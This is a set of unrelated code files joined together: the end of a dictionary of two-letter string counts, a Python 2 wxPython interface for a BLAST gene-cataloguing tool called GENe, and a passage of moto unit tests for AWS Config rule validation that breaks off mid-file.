'c6': 4,
'c7': 10,
'c8': 4,
'c9': 8,
'ca': 18400,
'cb': 368,
'cc': 678,
'cd': 484,
'ce': 3579,
'cf': 300,
'cg': 253,
'ch': 11318,
'ci': 2463,
'cj': 218,
'ck': 165,
'cl': 5881,
'cm': 371,
'cn': 895,
'co': 15790,
'cp': 497,
'cq': 239,
'cr': 5502,
'cs': 1710,
'ct': 364,
'cu': 6370,
'cv': 200,
'cw': 201,
'cx': 142,
'cy': 1053,
'cz': 246,
'd-': 147,
'd0': 7,
'd1': 14,
'd2': 37,
'd3': 29,
'd4': 10,
'd5': 5,
'd6': 4,
'd7': 8,
'd8': 6,
'd9': 7,
'da': 9910,
'db': 288,
'dc': 410,
'dd': 303,
'de': 11362,
'df': 288,
'dg': 307,
'dh': 280,
'di': 10934,
'dj': 682,
'dk': 157,
'dl': 393,
'dm': 361,
'dn': 476,
'do': 10944,
'dp': 211,
'dq': 106,
'dr': 6965,
'ds': 393,
'dt': 262,
'du': 4853,
'dv': 376,
'dw': 211,
'dx': 157,
'dy': 630,
'dz': 169,
'e-': 1066,
'e0': 9,
'e1': 12,
'e2': 26,
'e3': 27,
'e4': 11,
'e5': 2,
'e6': 6,
'e7': 6,
'e8': 37,
'e9': 5,
'ea': 6784,
'eb': 771,
'ec': 1530,
'ed': 2674,
'ee': 257,
'ef': 482,
'eg': 508,
'eh': 276,
'ei': 552,
'ej': 151,
'ek': 329,
'el': 3657,
'em': 1785,
'en': 4879,
'eo': 205,
'ep': 613,
'eq': 553,
'er': 2767,
'es': 1797,
'et': 766,
'eu': 1095,
'ev': 2975,
'ew': 218,
'ex': 2521,
'ey': 2066,
'ez': 772,
'f-': 75,
'f0': 6,
'f1': 54,
'f2': 25,
'f3': 5,
'f4': 9,
'f5': 12,
'f6': 2,
'f7': 4,
'f8': 10,
'f9': 2,
'fa': 12917,
'fb': 165,
'fc': 272,
'fd': 154,
'fe': 8514,
'ff': 195,
'fg': 107,
'fh': 175,
'fi': 14464,
'fj': 192,
'fk': 90,
'fl': 7482,
'fm': 210,
'fn': 114,
'fo': 8864,
'fp': 132,
'fq': 77,
'fr': 7566,
'fs': 413,
'ft': 252,
'fu': 5259,
'fv': 88,
'fw': 129,
'fx': 197,
'fy': 155,
'fz': 143,
'g-': 138,
'g0': 21,
'g1': 38,
'g2': 26,
'g3': 34,
'g4': 26,
'g5': 11,
'g6': 5,
'g7': 5,
'g8': 15,
'g9': 5,
'ga': 8708,
'gb': 232,
'gc': 262,
'gd': 339,
'ge': 5489,
'gf': 176,
'gg': 245,
'gh': 399,
'gi': 3752,
'gj': 108,
'gk': 138,
'gl': 2606,
'gm': 387,
'gn': 217,
'go': 9782,
'gp': 455,
'gq': 78,
'gr': 8101,
'gs': 381,
'gt': 252,
'gu': 5335,
'gv': 138,
'gw': 202,
'gx': 176,
'gy': 265,
'gz': 395,
'h-': 120,
'h0': 6,
'h1': 14,
'h2': 149,
'h3': 15,
'h4': 28,
'h5': 6,
'h6': 3,
'h7': 2,
'h8': 8,
'h9': 2,
'ha': 16216,
'hb': 351,
'hc': 228,
'hd': 442,
'he': 12087,
'hf': 180,
'hg': 158,
'hh': 243,
'hi': 10582,
'hj': 147,
'hk': 331,
'hl': 215,
'hm': 214,
'hn': 317,
'ho': 14380,
'hp': 207,
'hq': 147,
'hr': 318,
'hs': 380,
'ht': 314,
'hu': 4226,
'hv': 119,
'hw': 147,
'hx': 150,
'hy': 943,
'hz': 266,
'i-': 527,
'i0': 9,
'i1': 8,
'i2': 34,
'i3': 14,
'i4': 17,
'i5': 4,
'i6': 6,
'i7': 12,
'i8': 8,
'i9': 11,
'ia': 606,
'ib': 659,
'ic': 2175,
'id': 1981,
'ie': 282,
'if': 1514,
'ig': 488,
'ih': 370,
'ii': 226,
'ij': 122,
'ik': 351,
'il': 2287,
'im': 2155,
'in': 10117,
'io': 344,
'ip': 818,
'iq': 154,
'ir': 1037,
'is': 2803,
'it': 4514,
'iu': 135,
'iv': 328,
'iw': 391,
'ix': 87,
'iy': 123,
'iz': 230,
'j-': 143,
'j0': 7,
'j1': 2,
'j2': 20,
'j3': 8,
'j4': 10,
'j5': 1,
'j6': 1,
'j7': 2,
'j8': 3,
'j9': 2,
'ja': 3167,
'jb': 251,
'jc': 336,
'jd': 290,
'je': 2239,
'jf': 152,
'jg': 136,
'jh': 228,
'ji': 1541,
'jj': 266,
'jk': 191,
'jl': 249,
'jm': 340,
'jn': 230,
'jo': 7930,
'jp': 278,
'jq': 82,
'jr': 261,
'js': 448,
'jt': 174,
'ju': 4460,
'jv': 125,
'jw': 191,
'jx': 200,
'jy': 202,
'jz': 146,
'k-': 110,
'k0': 7,
'k1': 29,
'k2': 30,
'k3': 14,
'k4': 5,
'k5': 7,
'k6': 5,
'k7': 7,
'k8': 4,
'k9': 32,
'ka': 3724,
'kb': 212,
'kc': 275,
'kd': 182,
'ke': 6054,
'kf': 130,
'kg': 137,
'kh': 420,
'ki': 6316,
'kj': 144,
'kk': 167,
'kl': 487,
'km': 248,
'kn': 2612,
'ko': 1868,
'kp': 181,
'kq': 59,
'kr': 785,
'ks': 300,
'kt': 192,
'ku': 1013,
'kv': 116,
'kw': 230,
'kx': 88,
'ky': 444,
'kz': 90,
'l-': 45,
'l0': 12,
'l1': 8,
'l2': 60,
'l3': 18,
'l4': 6,
'l5': 2,
'l6': 2,
'l7': 14,
'l8': 5,
'l9': 3,
'la': 14155,
'lb': 350,
'lc': 258,
'ld': 192,
'le': 13390,
'lf': 172,
'lg': 196,
'lh': 179,
'li': 13775,
'lj': 185,
'lk': 82,
'll': 276,
'lm': 185,
'ln': 163,
'lo': 17441,
'lp': 192,
'lq': 75,
'lr': 137,
'ls': 265,
'lt': 197,
'lu': 2947,
'lv': 210,
'lw': 133,
'lx': 124,
'ly': 761,
'lz': 136,
'm-': 162,
'm0': 11,
'm1': 26,
'm2': 47,
'm3': 32,
'm4': 31,
'm5': 8,
'm6': 7,
'm7': 6,
'm8': 11,
'm9': 4,
'ma': 21517,
'mb': 321,
'mc': 856,
'md': 322,
'me': 12983,
'mf': 160,
'mg': 199,
'mh': 180,
'mi': 10847,
'mj': 190,
'mk': 192,
'ml': 403,
'mm': 572,
'mn': 242,
'mo': 11994,
'mp': 473,
'mq': 80,
'mr': 773,
'ms': 631,
'mt': 424,
'mu': 3947,
'mv': 212,
'mw': 145,
'mx': 138,
'my': 8975,
'mz': 124,
'n-': 85,
'n0': 16,
'n1': 16,
'n2': 209,
'n3': 6,
'n4': 10,
'n5': 3,
'n6': 4,
'n7': 6,
'n8': 14,
'n9': 2,
'na': 5028,
'nb': 379,
'nc': 347,
'nd': 186,
'ne': 10656,
'nf': 213,
'ng': 232,
'nh': 270,
'ni': 3672,
'nj': 370,
'nk': 136,
'nl': 174,
'nm': 214,
'nn': 176,
'no': 10377,
'np': 174,
'nq': 65,
'nr': 161,
'ns': 248,
'nt': 270,
'nu': 1902,
'nv': 175,
'nw': 247,
'nx': 119,
'ny': 630,
'nz': 150,
'o-': 95,
'o0': 2,
'o1': 5,
'o2': 28,
'o3': 13,
'o4': 2,
'o5': 5,
'o6': 2,
'o7': 2,
'o8': 4,
'o9': 1,
'oa': 322,
'ob': 1267,
'oc': 959,
'od': 2152,
'oe': 162,
'of': 3428,
'og': 208,
'oh': 1587,
'oi': 1494,
'oj': 147,
'ok': 724,
'ol': 2309,
'om': 1532,
'on': 7256,
'oo': 234,
'op': 1673,
'oq': 58,
'or': 3282,
'os': 555,
'ot': 634,
'ou': 4435,
'ov': 944,
'ow': 4377,
'ox': 218,
'oy': 187,
'oz': 441,
'p-': 86,
'p0': 12,
'p1': 19,
'p2': 43,
'p3': 24,
'p4': 15,
'p5': 8,
'p6': 2,
'p7': 2,
'p8': 5,
'p9': 5,
'pa': 15758,
'pb': 196,
'pc': 606,
'pd': 263,
'pe': 6763,
'pf': 189,
'pg': 207,
'ph': 2496,
'pi': 7203,
'pj': 148,
'pk': 162,
'pl': 7080,
'pm': 258,
'pn': 171,
'po': 11038,
'pp': 369,
'pq': 91,
'pr': 7474,
'ps': 686,
'pt': 286,
'pu': 6557,
'pv': 156,
'pw': 142,
'px': 98,
'py': 246,
'pz': 114,
'q-': 38,
'q0': 3,
'q1': 8,
'q2': 8,
'q3': 6,
'q4': 4,
'q5': 3,
'q6': 3,
'q8': 44,
'q9': 4,
'qa': 220,
'qb': 92,
'qc': 118,
'qd': 194,
'qe': 117,
'qf': 81,
'qg': 84,
'qh': 109,
'qi': 391,
'qj': 79,
'qk': 73,
'ql': 125,
'qm': 82,
'qn': 92,
'qo': 114,
'qp': 102,
'qq': 248,
'qr': 83,
'qs': 131,
'qt': 89,
'qu': 3434,
'qv': 65,
'qw': 148,
'qx': 97,
'qy': 109,
'qz': 152,
'r-': 89,
'r0': 7,
'r1': 10,
'r2': 26,
'r3': 20,
'r4': 17,
'r5': 2,
'r6': 2,
'r7': 10,
'r8': 1,
'r9': 4,
'ra': 9842,
'rb': 211,
'rc': 334,
'rd': 204,
're': 13653,
'rf': 215,
'rg': 139,
'rh': 365,
'ri': 7079,
'rj': 156,
'rk': 119,
'rl': 150,
'rm': 254,
'rn': 173,
'ro': 9275,
'rp': 216,
'rq': 46,
'rr': 143,
'rs': 333,
'rt': 270,
'ru': 4797,
'rv': 182,
'rw': 142,
'rx': 199,
'ry': 348,
'rz': 102,
's-': 122,
's0': 6,
's1': 26,
's2': 33,
's3': 27,
's4': 19,
's5': 10,
's6': 12,
's7': 19,
's8': 12,
's9': 6,
'sa': 17038,
'sb': 328,
'sc': 3980,
'sd': 603,
'se': 18133,
'sf': 356,
'sg': 309,
'sh': 12388,
'si': 10761,
'sj': 286,
'sk': 1551,
'sl': 2639,
'sm': 2210,
'sn': 818,
'so': 11313,
'sp': 6560,
'sq': 323,
'sr': 385,
'ss': 497,
'st': 11992,
'su': 9496,
'sv': 251,
'sw': 1490,
'sx': 289,
'sy': 1044,
'sz': 702,
't-': 149,
't0': 4,
't1': 14,
't2': 16,
't3': 20,
't4': 8,
't5': 8,
't6': 6,
't7': 9,
't8': 34,
't9': 12,
'ta': 10163,
'tb': 227,
'tc': 353,
'td': 239,
'te': 12576,
'tf': 165,
'tg': 186,
'th': 20347,
'ti': 8367,
'tj': 321,
'tk': 178,
'tl': 273,
'tm': 289,
'tn': 269,
'to': 11512,
'tp': 227,
'tq': 90,
'tr': 12301,
'ts': 469,
'tt': 280,
'tu': 3572,
'tv': 534,
'tw': 2193,
'tx': 266,
'ty': 1588,
'tz': 175,
'u-': 119,
'u0': 3,
'u1': 15,
'u2': 21,
'u3': 9,
'u4': 3,
'u5': 3,
'u6': 3,
'u7': 2,
'u8': 11,
'u9': 5,
'ua': 258,
'ub': 352,
'uc': 350,
'ud': 179,
'ue': 138,
'uf': 188,
'ug': 891,
'uh': 194,
'ui': 127,
'uj': 66,
'uk': 422,
'ul': 536,
'um': 326,
'un': 3354,
'uo': 106,
'up': 2718,
'uq': 59,
'ur': 923,
'us': 6826,
'ut': 474,
'uu': 108,
'uv': 172,
'uw': 165,
'ux': 93,
'uy': 107,
'uz': 97,
'v-': 87,
'v0': 3,
'v1': 8,
'v2': 11,
'v3': 20,
'v4': 8,
'v5': 4,
'v6': 14,
'v7': 2,
'v8': 9,
'v9': 2,
'va': 5048,
'vb': 168,
'vc': 200,
'vd': 140,
've': 2797,
'vf': 111,
'vg': 120,
'vh': 121,
'vi': 8878,
'vj': 91,
'vk': 117,
'vl': 172,
'vm': 152,
'vn': 149,
'vo': 2303,
'vp': 172,
'vq': 76,
'vr': 232,
'vs': 192,
'vt': 174,
'vu': 214,
'vv': 139,
'vw': 105,
'vx': 101,
'vy': 119,
'vz': 97,
'w-': 49,
'w0': 9,
'w1': 15,
'w2': 10,
'w3': 49,
'w4': 11,
'w5': 5,
'w6': 2,
'w7': 5,
'w8': 16,
'w9': 7,
'wa': 13399,
'wb': 160,
'wc': 178,
'wd': 138,
'we': 10270,
'wf': 145,
'wg': 135,
'wh': 7676,
'wi': 8165,
'wj': 154,
'wk': 103,
'wl': 169,
'wm': 219,
'wn': 137,
'wo': 4635,
'wp': 199,
'wq': 78,
'wr': 578,
'ws': 246,
'wt': 170,
'wu': 306,
'wv': 136,
'ww': 2494,
'wx': 193,
'wy': 274,
'wz': 183,
'x-': 157,
'x0': 8,
'x1': 15,
'x2': 61,
'x3': 15,
'x4': 2,
'x5': 8,
'x6': 12,
'x7': 3,
'x8': 5,
'x9': 3,
'xa': 329,
'xb': 191,
'xc': 220,
'xd': 145,
'xe': 282,
'xf': 158,
'xg': 136,
'xh': 144,
'xi': 794,
'xj': 208,
'xk': 79,
'xl': 180,
'xm': 285,
'xn': 107,
'xo': 163,
'xp': 292,
'xq': 82,
'xr': 126,
'xs': 195,
'xt': 344,
'xu': 208,
'xv': 78,
'xw': 84,
'xx': 552,
'xy': 237,
'xz': 171,
'y-': 45,
'y0': 5,
'y1': 6,
'y2': 13,
'y3': 2,
'y5': 5,
'y6': 4,
'y7': 4,
'y8': 3,
'y9': 4,
'ya': 1485,
'yb': 102,
'yc': 195,
'yd': 137,
'ye': 2320,
'yf': 106,
'yg': 116,
'yh': 159,
'yi': 568,
'yj': 136,
'yk': 131,
'yl': 168,
'ym': 174,
'yn': 217,
'yo': 4580,
'yp': 214,
'yq': 89,
'yr': 98,
'ys': 233,
'yt': 248,
'yu': 779,
'yv': 101,
'yw': 155,
'yx': 142,
'yy': 176,
'yz': 169,
'z-': 40,
'z0': 4,
'z1': 6,
'z2': 6,
'z3': 5,
'z4': 1,
'z5': 4,
'z7': 2,
'z8': 1,
'z9': 3,
'za': 920,
'zb': 144,
'zc': 129,
'zd': 141,
'ze': 1083,
'zf': 95,
'zg': 277,
'zh': 651,
'zi': 676,
'zj': 315,
'zk': 102,
'zl': 176,
'zm': 120,
'zn': 117,
'zo': 741,
'zp': 107,
'zq': 131,
'zr': 148,
'zs': 167,
'zt': 102,
'zu': 336,
'zv': 70,
'zw': 126,
'zx': 108,
'zy': 171,
'zz': 266,
}
| |
import wx
import os
import sys
import subprocess
from GENe import *
from wx.lib.pubsub import setuparg1
#Nathan Owen, ncowen@email.wm.edu
#GENe GUI - Mac Version
#---------------------------------------------------------------------------------------------------------------
class GENeGUI(wx.Frame):
def __init__(self,parent,id):
wx.Frame.__init__(self,parent,id,'GENe BLAST Automation and Gene Cataloger', size=(800,335), style=wx.MINIMIZE_BOX|wx.SYSTEM_MENU|wx.CAPTION|wx.CLOSE_BOX|wx.CLIP_CHILDREN)
self.Center()
self.panel = wx.Panel(self)
#Check to see if there are other instances of this same program. If so, close out.
self.name = "GENeGUI"
self.instance = wx.SingleInstanceChecker(self.name)
if self.instance.IsAnotherRunning():
wx.MessageBox("Another instance is running already.", "Only one GENe instance at a time.")
time.sleep(5)
sys.exit()
#IO Info
self.openFileName = ''
self.saveFileName = ''
#Static Texts
self.openFileText = wx.StaticText(self.panel, label = '', pos = (147, 18))
self.saveFileText = wx.StaticText(self.panel, label = '', pos = (192, 49))
self.colScroll = wx.StaticText(self.panel, label = 'Column Containing Sequences', pos = (600, 5))
self.progressText = wx.StaticText(self.panel, label = "Waiting to run." , pos = (10, 260))
self.localDBText = wx.StaticText(self.panel, label = "Local Database:" , pos = (85, 190))
self.serverDBText = wx.StaticText(self.panel, label = "Server Database:" , pos = (410, 190))
self.searchText = wx.StaticText(self.panel, label = "BLAST Search Type:" , pos = (410, 153))
self.evalText = wx.StaticText(self.panel, label = "e-value maximum:" , pos = (85, 153))
#Load Bar
self.progressBar = wx.Gauge(self.panel, -1, 1, pos= (10,280), size= (590,20))
#Buttons
catalogButton = wx.Button(self.panel, label = "Run GENe", pos = (600,260), size = (186, 50))
openFileButton = wx.Button(self.panel, label = "Open Excel File", pos = (10,10), size = (125, 30))
saveFileButton = wx.Button(self.panel, label = "Choose Save Destination", pos = (10,40), size = (175,30))
helpButton = wx.Button(self.panel, label = "Help", pos = (735,245), size = (50, 25))
errorLogButton = wx.Button(self.panel, label = "Open Error Log", pos = (600, 245), size = (133, 25))
self.Bind(wx.EVT_BUTTON, self.saveExcelFile, saveFileButton)
self.Bind(wx.EVT_BUTTON, self.openExcelFile, openFileButton)
self.Bind(wx.EVT_BUTTON, self.runCataloger, catalogButton)
self.Bind(wx.EVT_BUTTON, self.openREADME, helpButton)
self.Bind(wx.EVT_BUTTON, self.openErrorLog, errorLogButton)
self.Bind(wx.EVT_CLOSE, self.closewindow)
#Check Boxes
self.localCheck = wx.CheckBox(self.panel, -1, "Local Blast Search (Requires BLAST+)", pos = (85,90))
self.serverCheck = wx.CheckBox(self.panel, -1, "NCBI Server Blast Search (No installation required)", pos = (400,90))
self.serverCheck.SetValue(True)
self.queryType = 'queryServer'
self.xenoCheck = wx.CheckBox(self.panel, -1, "Use Xenopus Laevis algorithm - When disabled, GENe simply records top three BLAST hits.", pos = (85, 115))
self.xenoCheck.SetValue(True)
self.xenopusAlgo = True
self.Bind(wx.EVT_CHECKBOX, self.selectXeno, self.xenoCheck)
self.Bind(wx.EVT_CHECKBOX, self.selectLocal, self.localCheck)
self.Bind(wx.EVT_CHECKBOX, self.selectServer, self.serverCheck)
#Choices
self.dbChoice = wx.Choice(self.panel, -1, pos = (540, 188), choices = ['nr', 'refseq', 'swissprot', 'pat', 'month', 'pdb', 'refseq_mrna', 'refseq_genomic', 'est', 'est_human', \
'est_mouse', 'est_others', 'gss', 'htgs', 'pat', 'dbsts', 'chromosome', 'genome', 'HTGS', 'RefSeq RNA', 'RefSeq Protein', 'Build RNA', 'Build Protein', 'ESTs'])
self.dbChoice.SetStringSelection('nr')
self.serverDatabase = 'nr'
self.searchChoice = wx.Choice(self.panel, -1, pos = (540, 150), choices = ['blastn', 'blastp', 'blastx', 'tblastn', 'tblastx'])
self.searchChoice.SetStringSelection('blastn')
self.searchType = 'blastn'
#Text Entry
self.dbTextBox = wx.TextCtrl (self.panel, -1, 'nt', size = (120, -1), pos = (220, 188))
self.localDatabase = 'nt'
self.evalTextBox = wx.TextCtrl(self.panel, -1, '3', size = (120,-1), pos = (220, 150))
self.eValCap = None
#Scroll Counter Boxes
self.seqColumn = wx.SpinCtrl(self.panel, value='0', pos = (680,24), size = (60, -1))
self.seqColumn.SetRange(0,1000)
self.seqCol = 0
#Initialize GENe instance
self.newCatalog = GENe(self)
def errorPop(self, string, end = False):
'''Given a string that presumably contains an error message, this method will create a popup displaying that message'''
wx.MessageBox(string, "GENe Error or Update")
if end == True:
self.closewindow(None)
def runCataloger(self,event):
"Main method. Passess in most of the GUI's instnace variables to GENe and runs GENe in a thread."
#Make sure there is only one instance of GENe running as a result of this program.
if self.newCatalog.running == False:
#Collect contents from text boxes and GUI choices.
self.eValCap = float(self.evalTextBox.GetValue())
self.serverDatabase = self.dbChoice.GetStringSelection()
self.searchType = self.searchChoice.GetStringSelection()
self.seqCol = int(self.seqColumn.GetValue())
#Format the 'local database' variable for proper use in GENe (differs per operating system)
self.localDatabase = self.dbTextBox.GetValue()
### Double quotes for windows
if 'win32' in sys.platform:
self.localDatabase = '"' + self.localDatabase + '"'
### Single quotes for UNIX (MacOS and Linux)
else:
self.localDatabase = "'" + self.localDatabase + "'"
print "Databases you chose: ", self.localDatabase
#Set instance variables in GENe
self.newCatalog.seqCol = self.seqCol
self.newCatalog.eValCap = self.eValCap
self.newCatalog.queryType = self.queryType
self.newCatalog.searchType = self.searchType
self.newCatalog.xenopusAlgo = self.xenopusAlgo
self.newCatalog.localDatabase = self.localDatabase
self.newCatalog.serverDatabase = self.serverDatabase
#Force user to pick a file if they haven't already.
if self.openFileName == '':
self.openExcelFile(None)
return
if self.saveFileName == '':
self.saveExcelFile(None)
return
#Run the GENe program
self.newCatalog.readBook()
self.progressBar.SetRange(self.newCatalog.numberOfQueries)
if self.queryType == 'queryServer':
self.progressText.SetLabel("Initializing Server BLAST Query...")
if self.queryType == 'queryLocal':
self.progressText.SetLabel("Running Local BLAST Query. This may take a very long time.")
self.newCatalog.start()
def progressUpdate(self, progress):
'''Updates progress bar'''
if progress == -1:
self.progressBar.Pulse()
elif progress == -2:
self.progressText.SetLabel("Complete!")
elif progress == -3:
self.progressText.SetLabel("Terminated Early.")
self.progressBar.SetValue(0)
else:
self.progressBar.SetValue(progress)
progressString = str(progress) + ' of ' + str(self.newCatalog.numberOfQueries) + " catalogged."
self.progressText.SetLabel(progressString)
def openExcelFile(self, event):
dialog = wx.FileDialog(self, message= "Open an Excel File", style = wx.OPEN)
if dialog.ShowModal() == wx.ID_OK:
self.openFileName = dialog.GetPath()
if len(self.openFileName) > 55:
shortName = self.openFileName[0:55] + '...'
else:
shortName = self.openFileName
self.openFileText.SetLabel(shortName)
self.newCatalog.fileToOpen = self.openFileName
dialog.Destroy()
def saveExcelFile(self,event):
dialog = wx.FileDialog(self, message= "Choose save Destination", style = wx.SAVE)
dialog.SetFilename('GENe Results.xls')
if dialog.ShowModal() == wx.ID_OK:
self.saveFileName = dialog.GetPath()
#Make sure that the file being saved is in excel format.
if '.xls' not in self.saveFileName:
self.saveFileName = self.saveFileName + '.xls'
#Shorten up the name to display on the Window
if len(self.saveFileName) > 60:
shortName = self.saveFileName[0:60] + '...'
else:
shortName = self.saveFileName
self.saveFileText.SetLabel(shortName)
self.newCatalog.saveAs = self.saveFileName
dialog.Destroy()
def selectLocal(self, event):
'''Checkbox method for local selection'''
if not self.localCheck.IsChecked():
self.localCheck.SetValue(True)
else:
self.serverCheck.SetValue(False)
self.queryType = 'queryLocal'
def selectServer(self, event):
'''Checkbox method for server selection'''
if not self.serverCheck.IsChecked():
self.serverCheck.SetValue(True)
else:
self.localCheck.SetValue(False)
self.queryType = 'queryServer'
def selectXeno(self, event):
'''Checkbox method for Xenopus Laevis algorithm vs. Top three hits selection'''
if self.xenoCheck.IsChecked():
self.xenopusAlgo = True
else:
self.xenopusAlgo = False
def openREADME(self, event):
subprocess.call(['open', '-a', 'TextEdit', 'README.txt'])
#webbrowser.open('README.txt')
def openErrorLog(self, event):
subprocess.call(['open', '-a', 'TextEdit', 'Errorlog.txt'])
def closewindow(self, event):
del self.instance
sys.exit()
self.Destroy()
if __name__ == '__main__':
app = wx.App(True, filename = 'Errorlog.txt')
frame = GENeGUI(parent=None, id=-1)
frame.Show()
app.MainLoop()
| |
"""Unit tests specific to the ConfigService ConfigRule APIs.
These APIs include:
put_config_rule
describe_config_rule
delete_config_rule
"""
import json
from string import ascii_lowercase
import boto3
from botocore.exceptions import ClientError
import pytest
from moto.config import mock_config
from moto.config.models import random_string
from moto.config.models import ConfigRule, CONFIG_RULE_PAGE_SIZE
from moto import settings
TEST_REGION = "us-east-1" if settings.TEST_SERVER_MODE else "us-west-2"
def managed_config_rule():
"""Return a valid managed AWS Config Rule."""
return {
"ConfigRuleName": f"managed_rule_{random_string()}",
"Description": "Managed S3 Public Read Prohibited Bucket Rule",
"Scope": {"ComplianceResourceTypes": ["AWS::S3::Bucket", "AWS::IAM::Group"]},
"Source": {
"Owner": "AWS",
"SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED",
},
"MaximumExecutionFrequency": "One_Hour",
}
@mock_config
def test_put_config_rule_errors():
"""Test various error conditions in put_config_rule API call."""
client = boto3.client("config", region_name=TEST_REGION)
rule_name_base = "cf_limit_test"
for idx in range(ConfigRule.MAX_RULES):
managed_rule = managed_config_rule()
managed_rule["ConfigRuleName"] = f"{rule_name_base}_{idx}"
client.put_config_rule(ConfigRule=managed_rule)
with pytest.raises(ClientError) as exc:
managed_rule = managed_config_rule()
managed_rule["ConfigRuleName"] = f"{rule_name_base}_{ConfigRule.MAX_RULES}"
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "MaxNumberOfConfigRulesExceededException"
assert "maximum number of config rules" in err["Message"]
# Free up the memory from the limits test.
for idx in range(ConfigRule.MAX_RULES):
client.delete_config_rule(ConfigRuleName=f"{rule_name_base}_{idx}")
# Rule name that exceeds 128 chars in length.
rule_name = ascii_lowercase * 5
managed_rule = managed_config_rule()
managed_rule["ConfigRuleName"] = rule_name
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "ValidationException"
assert "Member must have length less than or equal to 128" in err["Message"]
@mock_config
def test_put_config_rule_update_errors():
"""Test various error conditions when updating ConfigRule."""
client = boto3.client("config", region_name=TEST_REGION)
# No name, arn or id.
managed_rule = {
"Description": "Managed S3 Public Read Prohibited Bucket Rule",
"Scope": {"ComplianceResourceTypes": ["AWS::S3::Bucket"]},
"Source": {
"Owner": "AWS",
"SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED",
},
}
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert (
"One or more identifiers needs to be provided. Provide Name or Id or Arn"
in err["Message"]
)
# Provide an id for a rule that does not exist.
managed_rule = {
"ConfigRuleId": "foo",
"Description": "Managed S3 Public Read Prohibited Bucket Rule",
"Scope": {"ComplianceResourceTypes": ["AWS::S3::Bucket"]},
"Source": {
"Owner": "AWS",
"SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED",
},
}
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert (
"One or more identifiers needs to be provided. Provide Name or Id or Arn"
in err["Message"]
)
@mock_config
def test_config_rule_errors(): # pylint: disable=too-many-statements
"""Test various error conditions in ConfigRule instantiation."""
client = boto3.client("config", region_name=TEST_REGION)
# Missing fields (ParamValidationError) caught by botocore and not
# tested here: ConfigRule.Source, ConfigRule.ConfigRuleName
managed_rule = managed_config_rule()
managed_rule["ConfigRuleArn"] = "arn"
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert (
"ConfigRule Arn and Id can not be specified when creating a new "
"ConfigRule." in err["Message"]
)
managed_rule = managed_config_rule()
bad_json_string = "{'name': 'test', 'type': null, }"
managed_rule["InputParameters"] = bad_json_string
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert (
f"Invalid json {bad_json_string} passed in the InputParameters field"
in err["Message"]
)
managed_rule = managed_config_rule()
managed_rule["MaximumExecutionFrequency"] = "HOUR"
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "ValidationException"
assert (
"Member must satisfy enum value set: {One_Hour, Six_Hours, "
"Three_Hours, Twelve_Hours, TwentyFour_Hours}" in err["Message"]
)
managed_rule = managed_config_rule()
managed_rule["ConfigRuleState"] = "BOGUS"
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "ValidationException"
assert (
"Value 'BOGUS' at 'configRule.configRuleState' failed to satisfy "
"constraint: Member must satisfy enum value set: {ACTIVE, "
"DELETING, DELETING_RESULTS, EVALUATING}" in err["Message"]
)
managed_rule = managed_config_rule()
managed_rule["ConfigRuleState"] = "DELETING"
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert (
"The ConfigRuleState DELETING is invalid. Only the following values "
"are permitted: ACTIVE" in err["Message"]
)
managed_rule = managed_config_rule()
managed_rule["CreatedBy"] = "tester"
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert (
"AWS Config populates the CreatedBy field for ServiceLinkedConfigRule. "
"Try again without populating the CreatedBy field" in err["Message"]
)
@mock_config
def test_aws_managed_rule_errors():
"""Test various error conditions in ConfigRule instantiation."""
client = boto3.client("config", region_name=TEST_REGION)
# Extra, unknown input parameter should raise an error.
managed_rule = managed_config_rule()
managed_rule["Source"]["SourceIdentifier"] = "IAM_PASSWORD_POLICY"
managed_rule["InputParameters"] = '{"RequireNumbers":"true","Extra":"10"}'
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert (
f"Unknown parameters provided in the inputParameters: "
f"{managed_rule['InputParameters']}" in err["Message"]
)
# Missing required parameters should raise an error.
managed_rule = managed_config_rule()
managed_rule["Source"]["SourceIdentifier"] = "CLOUDWATCH_ALARM_ACTION_CHECK"
with pytest.raises(ClientError) as exc:
client.put_config_rule(ConfigRule=managed_rule)
err = exc.value.response["Error"]
assert err["Code"] == "InvalidParameterValueException"
assert (
"The required parameter [alarmActionRequired, "
"insufficientDataActionRequired, okActionRequired] is not present "
"in the inputParameters" in err["Message"]
)
# If no MaxExecutionFrequency specified, set it to the default.
# rule_name = f"managed_rule_{random_string()}"
# managed_rule = {
# "ConfigRuleName": rule_name,
# "Description": "Managed S3 Public Read Prohibited Bucket Rule",
# "Scope": {"ComplianceResourceTypes": ["AWS::IAM::Group"]},
# "Source": {
# "Owner": "AWS",
# "SourceIdentifier": "IAM_PASSWORD_POLICY",
# },
# }
# client.put_config_rule(ConfigRule=managed_rule)
# rsp = client.describe_config_rules(ConfigRuleNames=[rule_name])
# new_config_rule = rsp["ConfigRules"][0]
# assert new_config_rule["MaximumExecutionFrequency"] == "TwentyFour_Hours"
@mock_config
def test_config_rules_scope_errors(): # pylint: disable=too-many-statements
"""Test various error conditions in ConfigRule.Scope instantiation."""
